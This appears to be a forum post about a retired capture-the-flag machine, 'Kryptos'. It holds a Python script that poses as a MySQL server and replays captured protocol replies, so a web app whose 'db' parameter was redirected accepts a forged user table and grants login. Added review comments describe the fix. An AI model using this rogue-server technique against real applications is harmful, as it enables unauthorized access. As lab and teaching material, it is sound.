Using a script that acts as a MySQL server to bypass the Kryptos login

@C136Rick said:

Kryptos retired and I didn’t get user; I was stuck at the encrypt part.
Thanks to @limbernie & @n1b1ru. I asked, and both of you responded, but I couldn’t solve it in the end. Well, I’m C136Rick, not @0xRick (you know what I mean) :p.
And thanks to @no0ne & @Adamm for making it; I like it.

Here is what I did. I just copied the MySQL responses into the program after analyzing captured MySQL network traffic in Wireshark. With that request’s parameter (db) set in Burp, I ran the program and got a 302, which means it worked.

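import socket
import logging
logging.basicConfig(level=logging.DEBUG)

# Canned MySQL wire-protocol replies, copied byte-for-byte from a Wireshark
# capture. They are bytes literals so sendall() accepts them on Python 3 as
# well as Python 2 (a str argument raises TypeError on Python 3).

# Wireshark Info: Server Greeting proto=10 version=5.5.53
SERVER_GREETING = (
    b"\x4a\x00\x00\x00"
    b"\x0a\x35\x2e\x35\x2e\x35\x33\x00"
    b"\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00"
    b"\xff\xf7\x21\x02\x00\x0f\x80\x15"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
    b"\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00"
    b"\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f"
    b"\x70\x61\x73\x73\x77\x6f\x72\x64\x00"
)

# Wireshark Info: Response OK
LOGIN_OK = b"\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00"

# Wireshark Info: Response.
# Result set with two columns (cryptor.users.username, cryptor.users.password)
# and a single row whose two values are both "dbuser".
QUERY_RESULT = (
    b"\x01\x00\x00\x01\x02"
    b"\x37\x00\x00\x02\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72"
    b"\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73"
    b"\x08\x75\x73\x65\x72\x6e\x61\x6d\x65\x08\x75\x73\x65\x72\x6e\x61\x6d\x65"
    b"\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00"
    b"\x37\x00\x00\x03\x03\x64\x65\x66\x07\x63\x72\x79\x70\x74\x6f\x72"
    b"\x05\x75\x73\x65\x72\x73\x05\x75\x73\x65\x72\x73"
    b"\x08\x70\x61\x73\x73\x77\x6f\x72\x64\x08\x70\x61\x73\x73\x77\x6f\x72\x64"
    b"\x0c\x21\x00\x96\x00\x00\x00\xfd\x01\x10\x00\x00\x00"
    b"\x05\x00\x00\x04\xfe\x00\x00\x22\x00"
    b"\x0e\x00\x00\x05\x06\x64\x62\x75\x73\x65\x72\x06\x64\x62\x75\x73\x65\x72"
    b"\x05\x00\x00\x06\xfe\x00\x00\x22\x00"
)

if __name__ == '__main__':
    # Serve exactly one client with the fixed reply sequence, then exit.
    #
    # The replies are a replay: whatever the client sends is read and
    # discarded, never parsed, so no credential is actually checked here.
    #
    # NOTE(review): per the post, the web application's `db` request parameter
    # ends up deciding what the application connects to, and the application
    # then accepts the result set as its own user table. The application-side
    # fix is to pin the database endpoint in server configuration instead of
    # deriving any part of the connection from request input. TODO confirm
    # against the application source.
    sock = socket.socket()
    try:
        # NOTE(review): 0.0.0.0 listens on every interface of this host;
        # bind to the lab-facing address only when one is known.
        sock.bind(("0.0.0.0", 3306))
        sock.listen(5)

        con, addr = sock.accept()
        try:
            logging.info('Connnect from: %r', addr)
            con.sendall(SERVER_GREETING)
            con.recv(2048)

            logging.info("Wireshark Info: Login Request user=dbuser db=cryptor")
            con.sendall(LOGIN_OK)
            con.recv(2048)

            logging.info("Wireshark Info: Request Query")
            con.sendall(QUERY_RESULT)
            con.recv(2048)

            logging.info("Wireshark Info: Request Quit")
            logging.info("done!")
        finally:
            # try/finally rather than `with`: sockets are not context
            # managers on Python 2, which the original str payloads imply.
            con.close()
    finally:
        # The original never closed the listening socket.
        sock.close()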

ohhh